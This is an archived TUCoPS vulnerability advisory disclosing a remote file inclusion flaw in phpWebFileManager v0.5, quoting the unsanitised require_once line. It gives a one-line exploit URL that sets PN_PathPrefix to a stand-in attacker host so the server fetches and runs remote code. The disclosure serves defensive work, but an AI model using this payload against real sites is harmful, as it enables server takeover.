TUCoPS :: Web :: PHP :: tb11849.htm

phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability
phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability
phpWebFileManager v0.5 (PN_PathPrefix) Remote File Include Vulnerability



-------------------------------------------------------------------------------------------------------------------

MEFISTO PreSents...


Script: phpWebFileManager v0.5
Script Download: http://platon.sk/projects/download.php?id=2 

Contact: ilker Kandemir 

Code:
require_once $PN_PathPrefix . 'functions.inc.php';  <<==== it's not defined

-------------------------------------------------------------------------------------------------------------------

Exploit: index.php?PN_PathPrefix=http://attacker.txt? 

-------------------------------------------------------------------------------------------------------------------

Tnx:H0tturk,Ajann,Dumenci,Str0ke

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH